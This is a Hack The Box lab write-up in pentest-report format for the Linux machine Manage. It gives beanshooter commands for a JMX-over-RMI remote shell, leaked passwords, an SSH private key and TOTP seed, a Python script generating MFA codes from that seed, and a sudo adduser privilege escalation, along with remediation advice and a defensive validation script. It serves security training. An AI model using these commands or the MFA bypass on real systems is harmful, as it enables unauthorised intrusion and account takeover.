HTB - Manage
JMX exposed over Java RMI allows unauthenticated enumeration and a remote shell via beanshooter's TonkaBean. A backup archive leaks an SSH private key and a Google Authenticator seed, enabling lateral movement to useradmin. A sudo rule permits adduser with a regex that accepts the username admin; adduser creates a same-named primary group, which Ubuntu's default sudoers grants full sudo, yielding root.
Hack The Box — Manage
Easy | Linux | Hack The Box
| Field | Value |
|---|---|
| Report Date | 07 May 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.234.57 |
| Hostname | manage |
| Domain | N/A |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Manage. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
Java Management Extensions (JMX) is exposed over RMI on TCP/2222 without authentication, allowing unauthenticated enumeration with beanshooter, which also reads the Tomcat user database and recovers two plaintext passwords. beanshooter's TonkaBean MBean can be deployed through the MLet loader and invoked to spawn a shell as the tomcat user. From that context, a backup archive in useradmin's home directory, readable by the tomcat account, yields an SSH private key and the .google_authenticator state file (TOTP seed and scratch codes); together these defeat the key-plus-MFA login and give a useradmin session. Finally, a sudo rule lets useradmin run adduser with any alphanumeric username. Creating a user named admin creates a same-named primary group, and Ubuntu's default sudoers grants that group full sudo rights, so the attacker-chosen password for admin is enough for sudo su to reach root.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.234.57 |
| Hostname | manage |
| Domain | N/A |
| Operating System | Linux |
| Machine Rating | Easy |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 07 May 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Nmap — SSH on 22, Java RMI on 2222, Apache Tomcat on 8080 | T1046 |
| Enumeration | beanshooter enum on Java RMI → MBean discovery → Tomcat credential leak | T1083 · T1078 |
| Initial Access | beanshooter TonkaBean shell → remote code execution as tomcat | T1190 |
| Information Disclosure | backup.tar.gz in /home/useradmin/backups/ → SSH private key and TOTP seed extracted | T1005 |
| Lateral Movement | SSH authentication via private key + TOTP verification code → useradmin session | T1021.004 |
| Privilege Escalation | Sudo regex permits adduser admin → new user's primary group admin matches the %admin entry in sudoers → sudo su with the attacker-set password | T1548.003 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
nmap -sC -sV 10.129.234.57
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 |
| 2222/tcp | Java RMI | Java RMI Registry |
| 8080/tcp | HTTP | Apache Tomcat 10.1.19 |
The machine runs Apache Tomcat with an associated Java RMI service on port 2222, which is characteristic of JMX (Java Management Extensions) infrastructure.
Enumeration — JMX via Java RMI
The Java RMI endpoint on port 2222 exposes JMX without authentication. Using beanshooter, we enumerate the available MBeans and services:
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum 10.129.234.57 2222
Discovered MBeans:
[+] Checking available MBeans:
[+] - de.qtc.beanshooter.tonkabean.TonkaBean (MLetTonkaBean:name=TonkaBean,id=1) (action: tonka)
[+] - com.sun.management.internal.HotSpotDiagnostic (com.sun.management:type=HotSpotDiagnostic) (action: hotspot)
[+] - com.sun.management.internal.DiagnosticCommandImpl (com.sun.management:type=DiagnosticCommand) (action: diagnostic)
Enumerated Tomcat Users:
[+] Enumerating tomcat users:
[+]
[+] - Listing 2 tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: fhErvo2r9wuTEYiYgt
[+] Roles:
[+] Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: onyRPCkaG4iX72BrRtKgbszd
[+] Roles:
[+] Users:type=Role,rolename="role1",database=UserDatabase
TonkaBean is not part of the target application: it is beanshooter's own MBean (package de.qtc.beanshooter.tonkabean), and the object name MLetTonkaBean:name=TonkaBean,id=1 shows it was loaded through the JMX MLet mechanism. It exposes command execution, an interactive shell and file upload/download to any client that can reach the JMX endpoint.
Initial Access — beanshooter TonkaBean Shell
Two commands are needed: the standard action deploys TonkaBean into the target JVM via the standard MLet loader, and the tonka shell action then opens an interactive shell through it:
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard 10.129.234.57 2222 tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.129.234.57 2222
Result:
[tomcat@10.129.234.57 /]$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
Shell access is established as the tomcat system user.
User Flag
The user flag is located in the Tomcat installation directory:
[tomcat@10.129.234.57 /]$ cat /opt/tomcat/user.txt
a86d44c7243b65a9171cf7da3e0bc279
Lateral Movement — Backup Exfiltration and TOTP Bypass
While exploring the filesystem as tomcat, an unencrypted backup archive is discovered in the useradmin user’s home directory:
[tomcat@10.129.234.57 /]$ ls /home/useradmin/backups
backup.tar.gz
The archive is readable by tomcat, but useradmin's home directory is not writable by it, so the contents are extracted under /tmp:
[tomcat@10.129.234.57 /tmp]$ tar -xzf /home/useradmin/backups/backup.tar.gz -C /tmp
SSH Private Key
The extracted backup contains the useradmin user’s SSH private key:
[tomcat@10.129.234.57 /tmp/.ssh]$ cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAKDh98jQtlV7BLoEEadDIQUrc5hD48KsQqyFXG9u+WaAAAAJiHKYIbhymC
GwAAAAtzc2gtZWQyNTUxOQAAACAKDh98jQtlV7BLoEEadDIQUrc5hD48KsQqyFXG9u+WaA
AAAECudKxoxJ6Vz74ca74nZArTpJUIagIpT06hEYuLpk4nkQoOH3yNC2VXsEugQRp0MhBS
tzmEPjwqxCrIVcb275ZoAAAAEHVzZXJhZG1pbkBtYW5hZ2UBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
Google Authenticator Seed
The backup also contains useradmin's .google_authenticator state file, which pam_google_authenticator reads on every login: the base32 TOTP seed on the first line, option lines prefixed with `" `, and a list of single-use emergency scratch codes:
[tomcat@10.129.234.57 /tmp]$ cat .google_authenticator
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775
The first line, CLSSSMHYGLENX5HAIFBQ6L35UM, is the base32-encoded TOTP secret (16 bytes). With it, a valid verification code can be computed for any point in time, so the second factor is defeated. WINDOW_SIZE 3 means the module accepts the code for the current 30-second step and one step either side; RATE_LIMIT 3 30 allows three attempts per 30 seconds, with the last attempt timestamp appended; DISALLOW_REUSE 57299617 is not a code but the time step (unix time divided by 30) of the last accepted code, the same step as the RATE_LIMIT timestamp 1718988529. The ten 8-digit numbers at the end are emergency scratch codes: each is a complete one-time login on its own and is deleted from the file once used, so any of them is an alternative bypass for as long as it is still listed.
SSH Access as useradmin
The SSH private key is copied to the attacker's machine (mode 0600) and used to authenticate. After the key is accepted, sshd still runs the keyboard-interactive step, where pam_google_authenticator prompts for a verification code; a TOTP generated from the leaked seed satisfies it:
ssh -i ~/.ssh/manage_key -o PasswordAuthentication=no useradmin@10.129.234.57
(useradmin@10.129.234.57) Verification code: [TOTP code from seed]
Result:
useradmin@manage:~$ id
uid=1002(useradmin) gid=1002(useradmin) groups=1002(useradmin)
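Generating the verification code from the leaked seed, as an added example that is not part of the original report and not beanshooter or pam_google_authenticator code: it parses the .google_authenticator file shown above (embedded verbatim), derives RFC 6238 TOTP codes from the seed, and lists every code the module would accept under WINDOW_SIZE 3. The function names are mine, and the RFC 6238 reference secret used to check the arithmetic is an added test value, not something from the target.

```python
# Added example, not part of the original report nor of beanshooter or
# pam_google_authenticator: parse the leaked .google_authenticator file and
# derive the TOTP verification codes that sshd asks for.
import base64
import hashlib
import hmac
import struct
import time

# Contents of the file recovered from backup.tar.gz (as shown in the report).
GA_FILE = """\
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775
"""


def parse_google_authenticator(text):
    """Split a pam_google_authenticator state file into its three parts.

    Line 1 is the base32 secret; lines beginning with '"' are options
    (RATE_LIMIT, WINDOW_SIZE, DISALLOW_REUSE, TOTP_AUTH, ...); remaining
    all-digit lines are single-use 8-digit emergency scratch codes.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    seed, options, scratch = lines[0], {}, []
    for ln in lines[1:]:
        if ln.startswith('"'):
            fields = ln.lstrip('" ').split()
            options[fields[0]] = fields[1:]
        elif ln.isdigit():
            scratch.append(ln)
    return seed, options, scratch


def b32_secret(seed):
    """Decode the base32 seed; the PAM module writes it without '=' padding."""
    padded = seed.upper() + "=" * (-len(seed) % 8)
    return base64.b32decode(padded)


def hotp(key, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(seed, unix_time=None, step=30, digits=6):
    """RFC 6238: HOTP with counter = floor(unix_time / step)."""
    if unix_time is None:
        unix_time = time.time()
    return hotp(b32_secret(seed), int(unix_time) // step, digits)


def candidate_codes(seed, unix_time, window_size=3, step=30):
    """Every code the module accepts with WINDOW_SIZE=window_size:
    the current step plus (window_size - 1) // 2 steps on either side."""
    centre, half = int(unix_time) // step, (window_size - 1) // 2
    key = b32_secret(seed)
    return [hotp(key, c) for c in range(centre - half, centre + half + 1)]


def disallow_reuse_time(options, step=30):
    """DISALLOW_REUSE stores the time step (unix_time // step) of the last
    accepted code, not a code; convert it back to unix time."""
    return int(options["DISALLOW_REUSE"][0]) * step


if __name__ == "__main__":
    seed, options, scratch = parse_google_authenticator(GA_FILE)
    now = time.time()
    window = int(options.get("WINDOW_SIZE", ["3"])[0])
    print("seed bytes  :", b32_secret(seed).hex())
    print("current code:", totp(seed, now))
    print("accepted now:", candidate_codes(seed, now, window))
    print("scratch left:", len(scratch))
    print("last use at :", disallow_reuse_time(options))
```

Run it when sshd shows the Verification code prompt; the middle of the three candidates is the current step, and the neighbours cover the one-step clock skew the module tolerates. Any of the scratch codes works once as well, which is why a leaked state file has to be treated as a full credential and not just as "the seed".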
Privilege Escalation — Sudo Regex Bypass
The useradmin user has limited sudo permissions. Checking available commands:
useradmin@manage:~$ sudo -l
Matching Defaults entries for useradmin on manage:
env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User useradmin may run the following commands on manage:
(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$
sudo (1.9.10 and later) treats an argument of the form ^...$ as a regular expression the command line must match. The pattern ^[a-zA-Z0-9]+$ only constrains the character set of the username; it says nothing about which names carry privilege, so admin passes. Because the rule is NOPASSWD and adduser prompts interactively, the attacker also chooses the new account's password.
Linux admin Group Privilege
Ubuntu's default /etc/sudoers still carries the legacy entry %admin ALL=(ALL) ALL: members of a group named admin may run any command as root after entering their own password. Debian/Ubuntu adduser defaults to USERGROUPS=yes, which creates a private group with the same name as the new user and makes it the primary group. No group named admin exists on the target, so adduser admin creates group admin (GID 1004) and places the new user in it, which is exactly the group the sudoers entry refers to:
useradmin@manage:~$ sudo /usr/sbin/adduser admin
Adding user `admin' ...
Adding new group `admin' (1004) ...
Adding new user `admin' (1004) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
New password: [set password]
Retype new password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] Y
Root Access
The newly created admin user's primary group is admin, which the sudoers entry above grants full sudo rights. The password chosen during adduser satisfies sudo's prompt:
useradmin@manage:~$ su - admin
Password: [password set above]
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@manage:~$ sudo su
[sudo] password for admin: [password from adduser]
root@manage:/home/admin# id
uid=0(root) gid=0(root) groups=0(root)
root@manage:/home/admin# cat /root/root.txt
b3645b7e6db6d5276ad33f0c75b8dc34
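The semantic check the sudo regex cannot perform, as an added example that is not from the report: a Python pre-check for a wrapper script that a sudo rule would point at instead of /usr/sbin/adduser. It re-applies the rule's character class, then refuses names that are reserved, that appear as a %group in sudoers, or that already exist as a group. The sudoers and /etc/group contents embedded below are constructed samples (mirroring the default Ubuntu sudoers entries and the accounts seen on this host); the function names, the reserved-name list and the ops group are my choices.

```python
# Added example, not part of the original report: the semantic username check
# that the sudo rule "(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$"
# cannot express. Intended for a wrapper script placed in front of adduser.
import re
import sys

# The character-class check sudo applies (the rule quoted in the report).
SUDO_RULE = re.compile(r"^[a-zA-Z0-9]+$")

# Names whose same-named private group (adduser default USERGROUPS=yes) or
# whose meaning is privileged on Debian/Ubuntu; list chosen for this example.
RESERVED = {"root", "admin", "sudo", "wheel", "adm", "staff"}

# Constructed sample mirroring the default Ubuntu /etc/sudoers entries, plus
# a hypothetical ops group with a delegated command.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL
%ops    ALL=(ALL) NOPASSWD: /usr/bin/systemctl
"""

# Constructed sample /etc/group with the accounts seen on the target.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
tomcat:x:1001:
useradmin:x:1002:
deploy:x:1003:
"""


def sudoers_groups(sudoers_text):
    """Group names that '%group ...' lines grant privileges to."""
    found = set()
    for line in sudoers_text.splitlines():
        m = re.match(r"\s*%([A-Za-z0-9_.-]+)\s", line)
        if m:
            found.add(m.group(1))
    return found


def existing_groups(group_text):
    """Group names from /etc/group (first colon-separated field)."""
    return {ln.split(":")[0] for ln in group_text.splitlines()
            if ln and not ln.startswith("#")}


def username_allowed(name, sudoers_text, group_text):
    """Return (allowed, reason). First the rule's own regex, then the checks
    the regex cannot make: reserved names, sudoers %groups, existing groups."""
    if not SUDO_RULE.match(name):
        return False, "rejected by character-class rule"
    if name in RESERVED:
        return False, "reserved privileged name"
    if name in sudoers_groups(sudoers_text):
        return False, "matches a %group entry in sudoers"
    if name in existing_groups(group_text):
        return False, "a group with this name already exists"
    return True, "ok"


if __name__ == "__main__":
    # A real wrapper would read /etc/sudoers, /etc/sudoers.d/* and /etc/group,
    # then exec /usr/sbin/adduser only when username_allowed() returns True.
    names = sys.argv[1:] or ["alice", "admin", "ops", "deploy", "bob;id"]
    for n in names:
        ok, why = username_allowed(n, SAMPLE_SUDOERS, SAMPLE_GROUP)
        print(f"{n!r:12} {'allow' if ok else 'refuse':7} {why}")
```

The sudo rule should then name the wrapper rather than adduser, with no argument regex at all; the wrapper owns the argument validation and calls adduser itself. Removing the %admin entry is still the more robust fix, since the reserved list above only covers names an operator thought of in advance.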
6. Proof of Access
| Level | Evidence |
|---|---|
| User | a86d44c7243b65a9171cf7da3e0bc279 |
| Root | b3645b7e6db6d5276ad33f0c75b8dc34 |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
| manager | fhErvo2r9wuTEYiYgt | Tomcat web password | JMX MBean enumeration |
| admin | onyRPCkaG4iX72BrRtKgbszd | Tomcat web password | JMX MBean enumeration |
| useradmin | ED25519 SSH private key | SSH authentication key | /home/useradmin/backups/backup.tar.gz |
| useradmin | CLSSSMHYGLENX5HAIFBQ6L35UM | TOTP seed (Google Authenticator) | .google_authenticator in backup |
| useradmin | Ten 8-digit codes (99852083, ...) | Single-use emergency scratch codes | .google_authenticator in backup |
8. Impact Assessment
Successful exploitation resulted in full root compromise via a four-stage chain: unauthenticated JMX over RMI (remote code execution and disclosure of the Tomcat user database), a backup archive readable by the tomcat service account that held an SSH private key and the TOTP state file, and a sudo rule whose regex constrains only the characters of the username, which allowed creation of an account whose primary group matches Ubuntu's default sudoers. No credentials are required at any stage: an attacker who can reach TCP/2222 can replicate the entire chain to root.
9. Remediation Summary
| Priority | Action |
|---|---|
| Critical | Bind JMX to localhost or a dedicated management network and firewall TCP/2222. Turn authentication and TLS back on (com.sun.management.jmxremote.authenticate=true with a password and access file, or a JAAS login module; com.sun.management.jmxremote.ssl=true). Both default to true once jmxremote.port is set, so unauthenticated access means they were explicitly disabled or a connector was started without an authenticator. Pin com.sun.management.jmxremote.rmi.port so the firewall covers the RMI port as well as the registry. |
| Critical | Do not keep backups containing private keys or MFA state in locations readable by service accounts; /home/useradmin/backups/backup.tar.gz was readable by tomcat. Encrypt backups and restrict them to the owner. |
| Critical | Rotate every secret recovered during the assessment: both Tomcat users, the useradmin key pair, and the TOTP seed and scratch codes (regenerate .google_authenticator). |
| High | Do not delegate adduser through a free-form regex; the pattern only checks characters. Either point the sudo rule at a vetted wrapper script that rejects reserved names (root, admin, sudo, wheel and any group named in sudoers) or restrict the rule to an explicit list of usernames. |
| High | Remove the legacy %admin ALL=(ALL) ALL entry from /etc/sudoers if no such group is in use (Ubuntu grants sudo through the sudo group), so that creating a group named admin no longer confers privileges. |
| Medium | Implement file integrity monitoring on backup locations and on /etc/sudoers and /etc/group. |
| Medium | Treat ~/.google_authenticator and SSH private keys as secrets: protect them with mode 0400, exclude them from archives, and keep MFA enforced on all SSH logins. |
10. Key Takeaways
- Exposed JMX over RMI can leak system credentials and permit arbitrary code execution without authentication; network segmentation is essential.
- Backup archives stored in user-accessible directories become a vector for lateral movement if they contain authentication material.
- Sudo argument regexes that constrain only the character set can still admit semantically privileged values; here the username admin produced a same-named group that matched an existing sudoers entry. Explicit allow-lists or a validating wrapper script are safer.
11. Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port and service discovery |
| beanshooter | JMX enumeration and remote shell via TonkaBean |
| ssh | SSH authentication via private key and TOTP |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Manage | RobInTheHood | 07 May 2026